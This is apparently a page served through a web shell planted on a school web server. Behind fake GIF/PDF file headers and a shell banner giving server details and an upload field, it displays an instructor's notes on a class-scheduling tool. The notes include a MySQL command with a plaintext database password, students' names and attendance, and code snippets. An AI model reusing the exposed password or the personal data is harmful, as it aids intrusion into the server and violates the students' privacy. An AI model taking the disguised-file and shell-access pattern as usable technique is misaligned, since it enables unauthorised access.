GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST2146/Notes/Archive/ |
Upload File : |
Notes: Continue working on: The task [Move meetings] Work on re-check of box. schedule2.js ~line 200 Should meetings with multiple days actually be multiple meetings? alter user 'scheduler'@'%' identified with mysql_native_password by 'Scheduler2146'; There are only 2 states moved or unmoved moved is the current location - ClassMeeting[scId][index] unmoved is the original location - ClassMeetingOriginal[scId][index] unchecked change moved to original (in ClassMeetingOriginal bTime, eTime, but my days). checked change to moved - how do I know what moved is. Need to store moved bTime, eTime, days then merge ClassMeetingOriginalIndex //F Friday comment <label for="chk_moveMeeting_T"> <input type="checkbox" class="movemeetingcheckbox" name="moveMeeting_3" id="chk_moveMeeting_T" onclick="MoveClass_DialogClick(this);" value="T" checked=""> Move <span class="weekday">T</span> 9:00am - 10:40am to <span class="weekday">T</span> 8:00am - 9:40am </label> <label for="chk_moveMeeting_W"> <input type="checkbox" class="movemeetingcheckbox" name="moveMeeting_4" id="chk_moveMeeting_W" onclick="MoveClass_DialogClick(this);" value="W" checked=""> Move <span class="weekday">W</span> 9:00am - 10:40am to <span class="weekday">W</span> 8:00am - 9:40am </label> <div id="calendar_class_22_T540" class="calendar_class Hutchinson" onmouseover="ttLoad(this,'',ScheduleInstructions,true);" onmouseout="ttHide();" style="left: 477px; width: 256px; display: block; top: 200px; height: 133.333px;"><div class="relative" style="height: 133.333px;">CST1025 <span class="nowrap">- 41,42</span> <span class="nowrap">2cr</span><br><span id="days_1002_1">TW</span> <span id="bTime_1002_1">9:00am</span>-<span id="eTime_1002_1">10:40am</span><br>rm 327.<br>Joyce Leske<br>1/9/2017-5/12/2017<br>scId:22 scmId:1002 <br> QId: courseId:2381 <br>Network Basics<div id="campus_22_T_Hutchinson" class="campus Hutchinson"></div></div></div> 2020-04-24 10 points. Attended Friday work session. Attended: Abdifatah Mohamed Austin Lease Branden Buermann Christopher Seiffert Cody Raduenz Damien Carlson Booted No audio 10:25 Darrien McAllister Drew Kallhoff Jameashia Nwankwo Leah Wibe 10:10 Natasha Iverson Zachary Nordmeyer Students: Abdifatah Mohamed Alexander Gould Austin Lease Branden Buermann Christopher Seiffert Cody Raduenz Damien Carlson Darrien McAllister Drew Kallhoff Jameashia Nwankwo Kathryn Nelson Leah Wibe Natasha Iverson Terence Jackson Zachary Nordmeyer detect mouse move vs click: const element = document.createElement('div') element.innerHTML = 'test' document.body.appendChild(element) let moved let downListener = () => { moved = false } element.addEventListener('mousedown', downListener) let moveListener = () => { moved = true } element.addEventListener('mousemove', moveListener) let upListener = () => { if (moved) { console.log('moved') } else { console.log('not moved') } } element.addEventListener('mouseup', upListener) // release memory element.removeEventListener('mousedown', downListener) element.removeEventListener('mousemove', moveListener) element.removeEventListener('mouseup', upListener)